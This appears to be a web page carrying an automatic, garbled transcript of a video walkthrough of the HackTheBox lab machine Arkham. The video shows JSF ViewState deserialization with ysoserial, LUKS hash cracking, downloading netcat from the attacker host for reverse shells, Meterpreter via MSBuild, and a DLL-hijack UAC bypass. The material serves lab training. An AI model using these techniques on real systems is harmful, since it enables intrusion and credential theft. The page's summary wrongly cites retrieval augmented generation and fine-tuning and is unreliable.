HackTheBox - Arkham

IppSec · Intermediate ·📰 AI News & Updates ·6y ago

Key Takeaways

This video demonstrates a Java deserialization attack to get code execution on the Box, using tools like Burp Suite, SMB share, and Python, and covering concepts such as retrieval augmented generation, fine-tuning, and Java deserialization attack. The video also explores exploitation, post-exploitation, and UAC bypass techniques.

Full Transcript

what's going on YouTube the zipsak we're doing Arkham from hack the box which was a relatively difficult machine for me mainly because of the Java deserialization attack it actually encrypts the Java object in the viewstate parameter so you can't just find the D serialization by looking for magic bytes a CED or r0 you have to do a bit of digging in the actual application the decryption key for the object is in a SMB share deluxe container so once you crack the lock scanner you can find that key and an old config file do some magic and python to encrypt the output of Y so serial to get code execution on the Box then when you're poking around the Box you can find credentials for an administrative user or in a PST file for Outlook you users credentials get on the box as admin but there is UAC preventing you from getting to the flag so you have to do it UAC bypass and when you do that you are golden so let's just jump into the box as always we begin with the end map so - I see four default scripts as V ordinary versions Oh a output or format spin the end map directory and call it Arkham and then the IP address which is ten ten ten one thirty can take some time to run so I've already ran it look at the results we have a handful of ports open the first one is HTTP on port 80 and that's running microsoft iis version 10.04 with a Windows 10 or 2016 box then you have your remote procedural calls on one 35 139 SMB is open on port 4 4 5 we have another HTTP port open on 8080 and that is running Apache Tomcat version 8 5 3 7 then outside of ports and map is telling us there is a clock skew of seven minutes so if we did anything like crypto or Kerberos related and have weird issues I'd probably try getting my box in synch with the target box because there's depend on time and then finally and map is telling us that message signing is enabled but not required not can really mean anything for hack the box machines because it's generally isolated to one machine but if I saw this on like a pen test I probably started purse ponder and set it to do and heal and really attacks while I work just in case I intercept a request from an admin and get escalate right away via ntlm relay but probably not gonna go in effect so let's just move on and take a look at the web page so go into ten ten ten one thirty we just get the default I is paid so I probably start running go Buster in the background see if I brute-force anything but not gonna do that right now because I'm doing the video and it takes up resources which could slow down my machine so checking on port 8080 and HTTP 10 10 10 130 80 80 that was open let's see nc TV 10 10 10 130 80 80 let's see it's just going extremely slow that is bizarre but we get a webpage from mask stay hidden and going down I'm just looking for like potential domain names or user names so mainly looking for emails we see this is in 15 new Street grey walled wet world I don't know looking at these Facebook Twitter links nothing there we click on company doesn't do anything about mask we had already seen that if we go to subscription looks like it's loading so what does that I'm gonna click on contact us and just to subscribe to newsletter clicking on what did I click on up there this subscription link brought us to user subscribe got faces and I'm just going to test something what would you like test at task calm and see what it says and just says thank you it's been registered so I'm going to set up burp suite and we're just going to see exactly what this does so click signup again go to burp and we can see everything it's ending so we have the ID JSP there's gonna be the email a function called up we got Java X faces viewstate and then a long base64 parameter view States probably gonna butcher the explanation but essentially instead of storing your entire cookie on the server the view state is the cookie I guess and we can see a bunch of gibberish I think if this wasn't encrypted then we'd be able to see some data about it so if we echo - and base64 - D just nothing we can send this over to a file and do file against it and says it's data so it doesn't recognize it so we can Google around and see exactly what this parameter is so if we go to Firefox Google this probably turn burp suite off and then Google the Java X faces dot view state it was my Internet that's going slow right now and additionally I'd be looking at what this dot faces extension is doing either these would get you to this page so can read this article and it's not gonna help us too much because the view state is encrypted so let's see can we see if this one is encrypted see unencrypted view state yeah so this is kind of what it should look like I think R 0 0 0 0 this is a Java C realized object that's just the base 64 of it so if we echo - n base 64 - D we can see Java dot laying down object so that's what we'd expect to see if it's not encrypted but because this one is encrypted you have this issue and you can also just Google for like the javac' Java magic bytes like Java magic bytes CEO wise and it's that r00 or a CED so if you see either a CED is the magic bytes or ro 0 a B that's most likely going to be a Java C Erised object so since it's encrypted we have to find a way to decrypt it I'm going to go back over to my end match scan results and see if there was anything else there is point four four five so let's try SMB map - capital H 10 10 10 130 to see if there's any open shares on this box we just get access to nine I'm going to specify the user not a mess and try not to miss log it on this box and we no longer get access to night and it starts listing out chairs so we see the admin share no access batch air we have read-only we have read-only over the IPC and we also have read-only over users so I'm going to specify - our for recourse and then depth we'll do five so we'll just start listing out all the files and these shares so bad chair we see the file app server dot zip these are all named pipes essentially and then we have the users directory but we can only see default and guest we can't go down into these folders unless we would have because we have recur set so I'm going to do SMB client - you anonymous and then slash slash 10 10 10 130 and this was bat chair I think oh just hit enter for the password do nothing do LS and we see the file there so I'm going to do get app server dot zip to start downloading this and it may take a little bit let's just open up a new pane and make sure it is downloading so we'll do D you - s episode our zip and it's not grabbing it I guess we're just wait for this command to finish um it just gave a weird error message parallel read ante status I Oh time out I'm gonna restart this I'm not sure exactly what happened but I don't think we should see that so do get again on app server dot zip and we'll see if it downloads it tell us that way still not getting it but it may be running to a cached file somewhere let's try SMB client - and this should do anything maybe it will slash that chair and we can actually before doing that make the SMB do this get AB server dot zip and it worked that is bizarre try this again get app server dot zip it got it there so I don't know why my SMB is paying wonky we can md5 sum of the two files to make sure we got the same thing so md5 sum episode we got zip and SMB app so we got zip they are the same so I'm just gonna remove the one like parent directory and go into this SMB directory no idea why it was acting that way so let's unzip this and we got important text and this is saying Alfred this is the backup image from a linux server please see that the joke or anyone else doesn't have an authenticated access to it Bruce so this is the very first hint that this is going to be a Batman theme box because you have Alfred the butler Bruce that is Batman and the Joker so then we have something we got app server zip so if we I just did unzip that and that gave us the backup dot IMG file so if we do file against that we can see it is a Lux encrypted file so if we go over to Google and search hash cat locks decrypt and we should get an article I think hacker noon will be fine and reading this whole thing gives you instructions how to get the header hash DDI f-test of' lux header block size 512 count 40 97 it's not always gonna be there I'd say like 99.9 percent of the time it's going to be there but one safe thing to do is do kripp setup Lux dump on backup dot image and then this payload offset that 4097 is just one above this so we can do DD I F equals backup image that is input file Oh F output file Arkham - looks block size equals 512 and count is equal to 40 97 so now we should have the lux header and we can send this over to hash cat so I'm gonna SCP this to the Kraken which is just a cracking server I have that has graphics cards to crack you don't need this but I would recommend not doing any hash cat type stuff inside a VM because it's very CPU intensive and you probably don't have much resources in your VM to crack so that's why I'm copying it off my machine and you should just copy it to like your host or somewhere else so we can copy or come down looks to ash cat hashes and we can go into hash cat and type hash cat - - example hashes and search for looks maybe it's all caps there we go and it's mood 14600 so I'm going to do dot slash hash cat - M 14600 hashes herkim - looks and then the word list I'm going to use is rocky text this is probably gonna take an extremely long time you had a bunch of hints that the box was Batman themed with the name Arkham Alfred Bruce the Joker so you may just want to create a password list based upon just Batman characters and then try this because Lux does not decrypt fast so just let this go we'll get the password and then keep on going and there we have it it has cracked the password as Lux or a Batman Forever so I can just copy this open the new session the passwords and there's gonna put Batman Forever there so we save it and then we can go into the SMB directory and mount this so we can do [ __ ] setup lux open back up dot IMG and then we'll call it Arkham and the passphrase Batman Forever and then if we look at dev mapper we should now have Arkham here so we can mount dev mapper come in to slash melt if we go and slash melt there is now a lost-and-found in a directory called mask go into mask and we got a few JPEGs documents and tommcatt stuff so I'm gonna do Norwest period to open up my file manager look at this so more Batman pictures going into documents we have Batman Begins and it looks like a script for it so let's go back into Tomcat stuff and it looks like we have a bunch of configs so let's go Tomcat stuff first thing I look at is Tomcat - users and we see it looks like everything is commented out one thing I should have done at the very getting is go to because it is Tomcat try like slash manager or maybe slash admin to see if any of those endpoints exist on Tomcat but doesn't look like you do so nothing's too interesting in that Tomcat - users we can look at server dot XML let's see doesn't really look like anything too interesting let's do basis config so now we have just the basic web page for faces nothing too interesting there if we do web.xml and just look through this it looks like something very stuck let's look at the web.xml got back and this looks completely different than web.xml like this is very much the default web XML and back is clearly something that is not default so let's take a look at this a bit more we have display name HelloWorld JSF then we have the faces servlet Java X faces web app faces servlet here's the extension so anything with dot faces will get sent through this config if we keep going we do have the org dot Apache dot my face is dark secret and then this which is the key used to encrypt so let's grab this and it's also telling us it's H Mac sha-1 for the algorithm so yank then actually yank it I'll probably just copy it in something else B passwords did not so what's just can't web.xml got back and where is it here it is grab this paste it here I know it's a secret not a password but same difference for us so we want to make sure we can now decrypt that uh viewstate parameter so let's see if that thing is valid so to do that we have to begin creating a Python script so we'll call this exploit dot pi the first thing I know I'll need is base64 some do from base64 import be 64 decode and be 64 encode then I also know I need sha-1 so I do from hashlib import sha-1 so we can begin a function of Def decrypt view state and we can give it the parameter view state so the key is equal to be 64 decode and then that will be cat passwords this okay now we run into the problem of not knowing what encryption algorithm this is so we could try print decrypt view state and we just need to get a view state thing so this string came from here so this is the view state we want to decrypt but we don't know how it was encrypted so this is where we have to go and read documentation from Apache my faces so if we do my face is maybe web.config let's see what does this have is this the page yep so let's see this has like all the variables of how to do the web.config and we see there is this org dot Apache dot my faces algorithm if it's not defined then it is des but it can be other things like AES Triple DES and whatnot so going to go into slash mail mask Tomcat can stuff grep for that against all those files and we don't have anything so this is telling us it is probably des so I'm going to do Python 3 I'm going to see if I can import PI des I could not someone do pip3 install PI DES and while that installs we can import PI DES we can import I think H Mac I forgot so now that PI doesn't installed we can begin the decryption so let's do object is equal to PI DES dot does pass it the key this is going to be in ECB mode and the pad mode is equal to PI does pad pkcs5 and you'd have to probably read the PI DES manual to understand all this but these are just the variables we saw in this here's that pkcs padding that I see sha argue them H max not 1 so just read that page and then created the correct parameters so now we can do deck for decrypt is equal to obj dot decrypt and then we want view state and that is gonna be passed through the variable name and if we print we can just return deck and we'll see what this does we may get lucky and this may just work let's see data length must be within eight bytes there's gonna be some type of weird padding I don't think I'd have to do that because I have it specified in pad mode oh I'm actually not unbasic ste falling the viewstate so let's do you state is equal to be 64 decode new state so let's try this again still the same thing let's do print the length of you state it is 92 characters in length and then even eight would be 96 or 88 so let's just pad this with four bytes so let's do you state is equal to you state plus four null bytes so now this should be a length of 96 which should be passing any padding and there we go so we see the a CED so this is definitely a java serialized object and we can see Java dot wagging object we could also if we wanted to print the be 64 encoded version of this and you can see that our o 0 so definitely have the correct decryption key so we've that there and we can begin with creating our payload so we're going to use Y so serial to generate one do I have it I do not so let's go in Google why so serial and we'll download this so we don't want the dotnet version there was a done man that could be fun to play with but download the latest JIT pack so we'll do W get let's make a directory why so serial and then W get the jar file and now we should be able to do Java dash jar why so serial and we get it so if you did a lot of searching around my faces you know there's common collections uh-huh we actually got my faces here one of those would work but I'm gonna use common collections so common collections v it should be up here yeah that's the one I'm using you can play around with a bunch of these to see if they work I've used a lot of the common collections ones before which is why I'm using that one then we can do CM d /c ping - n1 10 10 14 3 and see I thought that was it to generate maybe I misspelled common collections let's copy this paste it there we go so I'm going to direct this to route htb boxes arkham payload opt-in and we'll leave this here after we get this working with common collections we can try it with the specific one to my faces so we do def create payload and we can do payload is equal to open payload bin read and do we have to do anything like that and we can return payload we also need one for encrypt payload so this will be these lines and then we do encrypt is equal to obj dot encrypt payload and then we need to generate the H max so hash val h mac new key bytes cryptid sha-1 digest okay and now the payload is equal to the encryption plus h mac and we return the base64 encoded version of the payload so let's see trying to think how i did this yeah that's correct so return encrypt payload payload so when we call create payload it's going to open payload bin and read it and it's kind of past that to encrypt payload which is going to do this magic and that should be it so let's try print create payload I think I put a underscore I did write some 3x for top I 27 there we go so now we have our payload the know a thing we have to do is actually send the HTTP request so we can import requests and let's see we'll do def exploit going to give it a command view state is equal to create payload and then data is equal to Java X dot faces dot view state dot faces dot view state and then you state okay now we can do request dot post I think this is a post request URL let's define URL here at the top so you are L is equal to HTTP 10 10 10 130 slash user subscribed our faces URL data is equal to data and that should be it so we can just call exploit and we'll see if it works so Python 3 exploit PI go down here TCP dump - I ton 0 ICMP let this run and we don't get anything so we have a mistake somewhere so let's print view state and we'll do our is equal to this and print text okay we have a 404 error follow directory not found so chances are the URL is wrong that's probably because we didn't do port 8080 so did that and now we have a callback so every time I run this we get a ping we do see the web page is everything out so it doesn't look like we could get any text back so this is kind of a blind exploit so let's try one thing real quick let's copy payload been to work stop bin and let's try the Weisser serial with the faces so the same exact thing except we're going to try my faces - did i charger my face is - maybe I screwed something that's so weird my face is - I guess I have the command format wrong in that way I tried my face as one since that generated payload week at this it is a payload so let's go back and just run our exploit script and that one's not working so recommend using the common collections and common collections is just a Java library that's on the path destabilisation exploits allow you to create gadgets into libraries that are on the path to achieve command execution so the one thing I don't like about this right now is we don't have a way to easily edit the commands we have to run Y so serial every time so if we look at paler dumped in with x XD and go to where CMB is we have CM d /c ping - n1 the IP address mm is T so just before CMD you have one B which is going to be the length of this command it's a serialized object that's just the format so if we take this out and then just put the length in ourself and then put a command we don't want to call y sucio anymore we can just put any command we want so let's do that the first step will be getting this payload into a Python format which is just hex but a backslash X every two characters so we'll do x XD - p payload bin and now we have to put the backslash X so I'll do that was said what do you said PA period for two characters backslash X and so that won't delete the what we had before and then /g so now you have all the backslash X's and then we can for loop this so for I n this command do echo payload plus equals then byte string I and that quote done so now we have everything there we can do pipe that over 2x clip - selection primary to put in a clipboard and then go back into our exploit script so that's where encrypt payload is and comment that out paste capital V go all the way up what we want and then I'm going to hit the light greater than sign I guess on a u.s. keyboard it is the shift period and then we need pay loot is equal to be nothing so let's see what do we have to do now we have to find CMD so let's go man ASCII and find where C is so C is hex 63 so we're looking for 63 6 D then 6-4 so backslash backslash X 63 XS x I think I said 6d and then 64 so this is where our string begins so we can uncomment that and we'll do payload plus equals and then we have to do a command so we want the character length so Len CMD but there's gonna be a integer so we'll do the character of that and then we also have to convert it back into byte format so that's going to be the payload length and I need to end all these parentheses and then we do payload plus equals and then at CMD in code the dot encode just puts it in byte format and this will be the command so what we have to do now is go to the very end so we're looking for I think it's 10 I think one is 33 what is 1 it's fine where one is the hexadecimal a hex character for one where digits I'm just going to do Python 3 X 1 print X 1 well that didn't work no have it right here 31 so I want 31 30 because that's going to be an IP address 33 is 3 so we want to search for backslash X 31 X X X 30 so this is 10 2 e is period 10 period 10 then 33 will be 3 I believe so let's go back into ASCII table and validate that 33 is 3 and that's where a command ends it's paying 10 10 14 3 so put a clip here and delete all this stuff ok so now the thing to do is go up here and test this out by doing CMD is equal to CM d /c ping - at 110 10 14 3 and seeing if this still works so python 3x boy pi TCP dump - I ton 0 ICMP and it does so now we can create a little loop and go along away so I'm doing create payload with the command that's going to be CMD and then we'll call exploit with the command CMD and we'll just be lazy we won't do the command line loop we'll just do y all true and then exploit CMD and we can say CMD is equal to input please subscribe so Python let's get rid of this prints real quick print we don't need these there we go CM d /c pinged n 1 10 10 14 3 create payload is missing one required positional argument let's see create payload CMD ok that fly copy and paste it's working so what we can do is now try to get a reverse shell so we have the ability to see output so we can do NCL vnp 9001 and we can also try out-of-band methods like encoding data and paying or DNS requests but just can reverse shell will be easier and quicker so if this fails getting rid of a shell that's when we move to other things I'm going to make the directory dub-dub-dub go in here and copy opt nishang what is it shells invoke powershell tcp dot PS 1 and let's call this shell dot ps1 VI so PS let's see we want to grab this one the reverse and we'll put it here we want ten ten fourteen three point nine thousand one so we can now save this and then just do Python - mmm simple HTTP server right on port 80 and now we can try the i-x new object net web client download string HTTP 10 10 14 3 / shell ps1 and it doesn't ever get to us so what I'm going to do next is just try it without ie X and maybe antivirus kilda because it didn't like IX just basic troubleshooting taking things out and we don't get anything so I'm gonna try invoke - web request - URI HTTP 10 10 14 3 / shell dot ps1 and that one should have grabbed it let's try NC l v NP but these to be dumped - I ton 0 ICMP again just want to make sure this is working still pain works try and and ping - m110 1014 3 ping twice so we're not limited on like command links Oh dah I'm not doing PowerShell so we can try typing PowerShell and then paste we don't get any hits with the new object let's try PowerShell with invoke web object so PowerShell paste that in and we get they hit when we do invoke web request so let's actually move that one down here okay that'd be a bit easier to read so PowerShell constraint mode is probably enabled which disables doing things like this so we just have to do native PowerShell which is fine so we can go to Firefox we can try to download neck cat 64 student at cat windows and let's see eternally bored org this is the one I want we can download this then go into downloads unzip netcat and then move NC 64 DX c 2 h DB boxes arkham dubbed up dub NC dot exe so now we can do powershell IWR which is just shorthand for invoke web request - Eri 1010 14 3 / NC exe - out file will save it to C : windows 10 and C dot exe so we have it downloaded we can try CMD slash see what we want C : Windows 10 nc exe 1010 14 3 9001 I think it's - e 4 program to execute and we'll do PowerShell dot exe and there we have it we are now running as Alfred on the Box we can do Who am I slash prove to see if we had the like SEM person a token which we don't so let's go to a CD / do it LS we have users [Music] Alfred is who we are and then inside a desktop we do have the user flag we could also do like GCI or get child item - recurse period to list all the files and you should do things like this because you see there is a backup zip so we did GCI - recurse dot we could also do select full name which just puts in a bit easier format so we got tomcat dump bat that we may want to look at so we just look at that and doesn't seem too interesting but this backup zip is pretty interesting so we got to get this zip back to our box so we could try to do it through netcat but i'm just going to use cert util and then we will copy and paste it so so util - in code I'll paste the path and then we want to send it to see : windows tam backup dot B 64 encode command completed successfully so now we should be able to type windows tab backup dot B 64 and let's see type C : windows tab backup dot b 64 there we go so we can just highlight everything and then copy it down to our machine that will open a new shell will rename this to Alfred three let's do them back up dot B sixty-four paste and we can base64 - D - decode it and then call it back up zip and then let's make derp Alfred and we'll move back up zip there I just hate unzipping things in like my parent directory and then they just have more files than expected but this just has one file and that is a OST file so we do file against that we just see it's a Microsoft Outlook email folder we can do read PST against this and then that creates a mailbox file if we go into this we can see just various emails from it it's going to be like HTML encoded in base64 so it's not easy to read but we do have evolution I think we can just specify drafts mbox and evolution will import it so if we just input the data click next location fine and we have one new message for as evolution I don't see it open let's try just opening it without the argument there we go so we have on this computer in box one mail a demon if we open this we have an email probably from Alfred it just says mail a demon - Batman mr. Wayne please stop for getting a password and that shows the password for Batman so let's move this down here so we can easily type I'm going to move it up a little bit there we go so I'm going to go into my passwords file VI passwords and we want to do Z X Charat pound qz x + t a summation point one two three we can cap this so we can easily copy it and now I want to do SMB Matt - new Batman - P paste in the password - age ten ten ten one thirty and we see it lettuce low again so we have the password correct but doesn't really buy us anything we actually lost access hilariously enough because we used to have access to batcher we don't anymore so we put in a bad password let's just get rid of a few characters we should see access denied so we know we have Batman's password it's just not working so we go to end map oh come down map see if there's any ports that we missed probably not I mean we can't really do PS exec because we can't write to see doll or admin dollar and I don't see any other ports exposed to us so I'm gonna do end that - P - - V for reverse Oh a and map all ports ten ten ten one thirty we can close that evolution we don't need that anymore and then well this runs let's just try something over here so let's try password is equal to convert to secure string oh crap okay let's count credentials or a cat passwords grab it go back to Alfred and let's run this command again so what we're going to do is try PowerShell remoting through localhost because it doesn't always exposed over the network but it may be exposed locally we can't just do like run as because we don't have a full like shell so this is like the next best thing so that command should work if we do pass it's as a system secure string the next thing we have to do is create the credential object so new object system management automation PS credential and this is going to be for Batman and then we want to put the pass okay so let's look the host name the host name is Arkham whenever you do like windows are moving you always should use Harris names and IP addresses so we do invoke command - computer Arkham oh heavens dawning Arkham wrong all this time a rkh am I think I've been doing a hm oh well okay um and then we want to do - script block Who am I and then - credential cred okay we have it running we are now escalated to that user so we can try downloading netcat again and grabbing it so i WR - PRI what is it 10 10 10 14 or 10 10 14 3 and c dot exe out file NCT XE - credential cred I wish I did our L rap when doing this because I would have say myself headaches by allowing me to have like the up K a character oh well so now that you've got netcat there we can do CMD slash C and C dot exe ten ten fourteen three 9001 - e powershell d XE - credential cred so let's try netcat LVN p 9001 on this and I'm gonna learn for my mistake and do RL wrap this time so it's just copy and paste this okay so now that it's or a wrap you can see this is going through previous box by my up key so that's very nice to have and I can do ctrl L to clear the screen so now that we are the Batman user let's see what we have in a directory so GCI recurse dot select full name and we don't really have anything else there is another tomcat dot bat file that we can look at so we can look at that same exact thing we can run like system info and because we're in PowerShell constrained mode that's why I'm not running like power up and things like that we get access denied with system info we can verify Pausch constraint mode so we'll just do like new object net web client and we see only core types of support in this language mode so we did confirm that's why that wasn't working before we can try like net local group administrators and we see that we are a member of the administrator group so if we just go CD dot dot CD administrators or a CD administrator we can't do it we can but we get denied when we LS inside of you so we do who am i / all we should see we have the same exact privileges as normal username let's see here the groups were a member of built-in administrators but I'd expect to see more privileges and this is because of UAC the user access control so there is a bypass to this we could just do net use Z : 1 to Y 7 0 0 $1 NC and then go into Z : and then users administrator and get his hash this way so that's one way to do it but if you wanted to and I have no idea why this way works honestly because I had done chisel and for did point 4 for 5 from localhost to my machine and it still didn't let me access the see dollar sign so I'm guessing even though was specifying backslash backslash 1 27001 backslash see dollar it's not doing it over the network it's a different authentication then through like SMB client or something so not sure exactly why that works but it does going to the UAC bypass the easiest way to do this is getting a session under a interactive process because most UAC things based upon the process elevating and having a GUI and right now we're not in a non interactive mode which means we just don't have access to those so anything we do won't work so the first thing I'm going to do is find a UAC bypass I'm gonna Google UAC me and this just has bunches of good information let's see go near the bottom I think when it has this it's unfixed so do the one from egress what's the implementation you see em egress method by just Google egress UAC bypass we go to is github and this explains how to find it find binaries that have auto elevate set to true and then find ways to exploit them so this one if we create a DOL and place it in the Windows app folder then this binary will load that DLL for us and execute it so and if you said UAC policy to always notify then this auto elevate thing doesn't exist and these type of things are patched so here it is so you want the DLL SR are sto DLL to be in I think it's Windows apps the Windows app folder says it's somewhere oh right here so if we put the DLL and c colon users user name app data local Microsoft Windows apps tol we can execute it so what this is showing us this is proc Mon and proc mom is running when it opens that file and we can see it's looking for that do l and all these locations and getting name not found so it checks all these directories which we can't write to we can't write to the windows directory most likely but we can write to or use a directory and that's the final place it loads from so that's why this is all working so we have to do two things now we have to create a DLL and we also have to escalate to a interactive session process so to get the interactive session process we're going to use meterpreter and Metasploit and then to do the dol we'll just code it by hand so this box does have Windows Defender on it so we can't just drop meterpreter you could use like go Ebola that's eb o WLA we've done that in other videos if you just search upset Cibola you can find the video that does that but we're going to show a different one we're going to use msbuild so we'll do great SCT and go to this github project CD up get clone download this and then we have to set it up so if we do setup so SH continue with installation yes and this will take a while to set up so we'll rename this to create SCT and then we'll start creating or a DLL so make dur DLL and then we will make main dot C the first thing we do is this windows definition so include windows dot H and then we create the DLL and this would probably be auto-generated for you if you used any like IDE or anything but it's basic so H instance that D word DW reason and we need LP void lb reserved okay and then switch DW reason so these will be a case statement with everything so DLL process attach this will be do stuff and we have to do semicolon break then case DOL process detach break okay DOL thread attached and we just looked at like the windows API you know all these commands we have access to like DLL process attached because of that Windows dot H click ok this is just great st SE t still installing so case DOL thread detach break okay we can close out of the switch then return 0 that so do stuff this is what we're gonna do Oh code so I'm just gonna call when exec I'm going to do C colon users Batman NCT XE 1010 14-3 9001 - e powershell and like that so upon attaching the DLL we'll just call this neck head binary and send this reverse shell that is it for the DLL so we can close out of that and then do I 686 windows 64 m and GW g plus plus main c standard compiling flags and the name was sr STR gol - shared because it's a DLL and let's see we probably have a typo yep d teach detach compile and now we got the DLL great SCT is still installing so we just got to wait for this to complete and then we can get our DLL set up actually I guess we could copy it over so go here we can copy this to dub dub dub go back to a Batman shell we know we can write into this directory cell IWR and the web request URI HTP 10 10 14 3s r st r dot dl l - out file same thing to download this LS ok we got it I guess we should have done that once we went in here but we got to go into where is it it was app data local just update a local Microsoft Windows apps Microsoft Windows apps so copy see : users batman sr str dll to this directory okay so that's all now setup and it's still doing something I don't know why it's I guess I did an apt update because now it's installing Metasploit framework which I know I have so it's by just updating it so if we have an interactive session and execute this binary we will get a show didn't mean open link take on my clipboard it did not let's go back copy you can do NCO VMP 9001 when does it kill my shell it's not it there we go Fielder on operational choirs an interactive window just got to wait for this which now it is finally done so we can go see DDOT and execute this application so we can just type list to see the available tools it's only got bypass will choose one or do list again ah menu choice one use one okay so now we got 26 payloads to choose from so we can do list again and see all the payloads I'm just going to use my trip to reverse TCP so use nine so now we just specify el host out port and such and it should work so we can set el host 10 10 14 3 set el port or do nine thousand two and then generate base name for the output files default is payload it's fine with me so now we've got the Metasploit or C file so we can do MSF console - our paste the RC file then we can grab this payload XML and copy this to the dub-dub-dub directory okay so now we just have to download this payload so invoke web request and then your in10 14-3 slash payload xml out file payload xml so now we have it and the final thing is to use msbuild to execute this so now we just have to find where msbuild is sin that is normally in sequel in windows microsoft.net and then we want framework 64 then V 4.0.3 o31 nine and my msbuild should be in there so msbuild dot exe specified payload xml and i guess we can do CMD / c build started it aired but we got meterpreter session 1 has been opened so I can do sessions - I won and I'm gonna move my neck at Shell over to my meterpreter window and the temperature session one died let's try this again one thing is supposed to begin those errors reduced sessions - I - I doubt it works we do help it only loads the core commands and never loads the advanced API so what I think happened as I loaded the 32-bit version and great asset or great SCT did 32-bit meterpreter and I specified framework 64 which does the 64 bit version of msbuild which isn't working so I got rid of framework 64 for a framework and I'm not getting that error message anymore and it looks like it's working if I do help we have standard API commands so now I can do PS and we can try to migrate in 50 20 and this may take a few times because Windows Defender may kill it or it may not it doesn't always kill it for some reason so this time it looks like it's going to die which means we'll just have to get another session and do this again so probably take three or four times so first one timed out let's do this again session 4 opened so let's do sessions - I for PS migrate 50 20 and all we have to do is migrate in a process that has this one so we got in so now if I do she'll we can go to where Batman is and let's go up where was that application that required interactive interactive I guess we can just copy it so still here all I'm gonna do is copy this go back to here paste it in and nothing well that's unfortunate let's do CD backslash users Batman local CD users Batman app data local dir CD Microsoft CD Windows apps I think dir a DLL is there system properties advanced exe not working could have swore that would work um let's see let's look back at a dll v main c c : users Batman NC Exe let's make sure that exists dir we do not have netcat here so we probably put neck at somewhere else let's just download it your eye 10 1014 3nc dot exe out file NC dot exe dir now that net cat is there paste and still nothing let's see C : users Batman NC exe 10 10 14 3 that should work let's just copy and paste this into a Batman shell go here ok that works I guess we could try run DLL 32 DLL definitely works don't know where that application is not going system properties advanced exe let's just try CMD / SI system properties advanced dot exe taking longer this but we still aren't getting a shell I wonder if my shell up here is just dead and that's why is let's do PS PID how do I do find out what process I'm in get system let's see new ID no PS let's just try this one more time CMD /c let's try full path windows 64 system properties advanced dot exe and let's make sure I'm doing 9001 which yes I am and CL VMP 9001 run there we go I won't if we need the full path or maybe I just I don't know if we do who am i / all now we can see a bunch more privileges than the just two we had previously and we go to CD users administrator desktop where you can get root our text so let's play with this real quick let's do show if we just do this doesn't execute CMD / see that CMD / C and then the full path let's so we have to kill it now advanced so I guess we can kill one seven six four okay shell system properties advanced dot exe so we just run this nothing CM d /c run that nothing CMD /c c colon windows sis well 64 that that's literally what I just did maybe it didn't kill it so let's see this was the 1 cm d /c windows as well system properties advanced audience it can't be the casing on this can it I'm going insane right now PS system we're gonna try this one last time advanced so kill 21:56 okay shell so NCLB NP 9001 pace that all I want to grab is this nothing CMD / see nothing let's get out a system 32 ok CMD /c c colon windows sis well 64 that so capital s capital w CM d /c c : windows sis well 64 I'm not sure why it works sometimes on why it doesn't work other times unless I keep making weird typos let's see maybe just doesn't like this session maybe it's because I keep doing a new session let me just copy this exit PS advanced it's probably related to that actually so kill to 360 so yeah so probably should be one of the first commands you run in the session if you do other ones you may just put in a weird state so hope you guys enjoyed that box take care and I will see you all next week

Original Description

00:55 - Begin of Recon 02:20 - Checking the WebPages 03:50 - Examining /userSubscribe.faces, to discover potential deserialization 05:00 - Exploring javax.faces.ViewState 05:50 - Googling around to see what an unencrypted serialized object should look like 07:15 - Checking out SMB to discover an openshare 09:00 - Downloading appserver.zip from batshare via smbclient 11:00 - Cracking a luks encrypted file with dd and hashcat 14:00 - Luks cracked, mounting the disk with luksOpen 16:20 - Discovery of the secret used to encrypt the java object 18:10 - Creating a python script to decrypt the ViewState to verify we have correct crypto settings 23:10 - Script completed, lets test the decryption! 24:15 - Downloading ysoserial to create a deserialization CommonCollections gadget 26:00 - Creating a python script to exploit the deserialization vuln 31:00 - Script complete! We got a ping, testing the MyFaces serialization objects (did not work) 33:00 - Modifying the script to run commands other than what ySoSerial provided 41:10 - Script updates finished, trying to get a reverse shell via nishang (did not work) 42:40 - Trying Invoke-WebRequest, because Net.WebClient did not work. (testing for constrained mode) 45:00 - Downloading netcat to upload to the box 46:00 - Netcat returned a powershell reverse shell 47:20 - Discovering Backup.zip, downloading, using readpst to convert it to a plaintext mbox file 50:00 - Using evolution to view mbox file and find Batman's password 52:45 - Using Powershell's Invoke-Command to execute commands as Batman (like runas) 55:40 - Reverse shell as batman returned! Running a few commands to find out he is localadmin but needs to break out of UAC 58:10 - Unintended: Using net use to mount c$ and view the flag 59:30 - Checking github hfiref0x/UACME to find a UAC Bypass. Chose one by a fellow HTB Member 01:02:10 - Using GreatSCT/MSBuild to launch Meterpreter 01:02:45 - While GreatSCT installs, create a DLL to return a reverse shell 01:06:00 - c
Watch on YouTube ↗ (saves to browser)
Sign in to unlock AI tutor explanation · ⚡30

Playlist

Uploads from IppSec · IppSec · 0 of 60

← Previous Next →
1 HHC2016 - Analytics
HHC2016 - Analytics
IppSec
2 HackTheBox - October
HackTheBox - October
IppSec
3 HackTheBox - Arctic
HackTheBox - Arctic
IppSec
4 HackTheBox - Brainfuck
HackTheBox - Brainfuck
IppSec
5 HackTheBox - Bank
HackTheBox - Bank
IppSec
6 HackTheBox - Joker
HackTheBox - Joker
IppSec
7 HackTheBox - Lazy
HackTheBox - Lazy
IppSec
8 Camp CTF 2015 - Bitterman
Camp CTF 2015 - Bitterman
IppSec
9 HackTheBox - Devel
HackTheBox - Devel
IppSec
10 Reversing Malicious Office Document (Macro) Emotet(?)
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
11 HackTheBox - Granny and Grandpa
HackTheBox - Granny and Grandpa
IppSec
12 HackTheBox - Pivoting Update: Granny and Grandpa
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
13 HackTheBox - Optimum
HackTheBox - Optimum
IppSec
14 HackTheBox - Charon
HackTheBox - Charon
IppSec
15 HackTheBox - Sneaky
HackTheBox - Sneaky
IppSec
16 HackTheBox - Holiday
HackTheBox - Holiday
IppSec
17 HackTheBox - Europa
HackTheBox - Europa
IppSec
18 Introduction to tmux
Introduction to tmux
IppSec
19 HackTheBox - Blocky
HackTheBox - Blocky
IppSec
20 HackTheBox - Nineveh
HackTheBox - Nineveh
IppSec
21 HackTheBox - Jail
HackTheBox - Jail
IppSec
22 HackTheBox - Blue
HackTheBox - Blue
IppSec
23 HackTheBox - Calamity
HackTheBox - Calamity
IppSec
24 HackTheBox - Shrek
HackTheBox - Shrek
IppSec
25 HackTheBox - Mirai
HackTheBox - Mirai
IppSec
26 HackTheBox - Shocker
HackTheBox - Shocker
IppSec
27 HackTheBox - Mantis
HackTheBox - Mantis
IppSec
